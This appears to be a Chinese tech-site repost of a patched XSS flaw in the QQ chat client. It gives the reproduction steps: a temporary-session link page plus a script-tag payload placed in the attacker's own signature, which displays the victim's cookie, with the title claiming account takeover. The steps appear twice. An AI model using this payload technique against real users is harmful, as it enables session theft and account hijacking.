[已修复]QQ客户端聊天就中的XSS(可登陆和控制他人账号)
创建个临时会话的网站页面 360.htm,内容是
<a target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin= 想攻击的QQ号 &site=qq&menu=yes"><img border="0" src="http://wpa.qq.com/pa?p=2:想攻击的QQ号:51" alt="点击这里给我发消息" title="点击这里给我发消息"/></a>,
把自己QQ号码签名为超级牛B的 </script><script>alert(document.cookie)</script>,
打开360.htm,和对方说话,对方就会被XSS到了 原因是临时会话窗口右侧的个人资料里的签名没过滤。
<a target="_blank" href="http://wpa.qq.com/msgrd?v=3&uin= 想攻击的QQ号 &site=qq&menu=yes"><img border="0" src="http://wpa.qq.com/pa?p=2:想攻击的QQ号:51" alt="点击这里给我发消息" title="点击这里给我发消息"/></a>,
把自己QQ号码签名为超级牛B的 </script><script>alert(document.cookie)</script>,
打开360.htm,和对方说话,对方就会被XSS到了 原因是临时会话窗口右侧的个人资料里的签名没过滤。
>更多相关文章
- 11-15不看后悔!程序员防御XSS的无奈
- 11-10揭秘Web黑客3种注入点判断方法
- 11-10黑客Web脚本注入攻击深度剖析
- 10-21全球无线网络面临黑客攻击风险 WiFi曝安全漏洞
- 02-24iPhone再爆安全漏洞 黑客1分钟可盗照片及加密信息
- 02-22互联网金融风险 警示网站漏洞或成“致命点”
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 04-21中国产品数字护照体系加速建设
- 04-21上海口岸汽车出口突破50万辆
- 04-21外媒:微软囤货GPU以发展AI
- 04-21苹果手表MicroLED项目停滞持续波及供应链
- 04-21三部门:到2024年末IPv6活跃用户数达到8亿
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御
粤公网安备 44060402001498号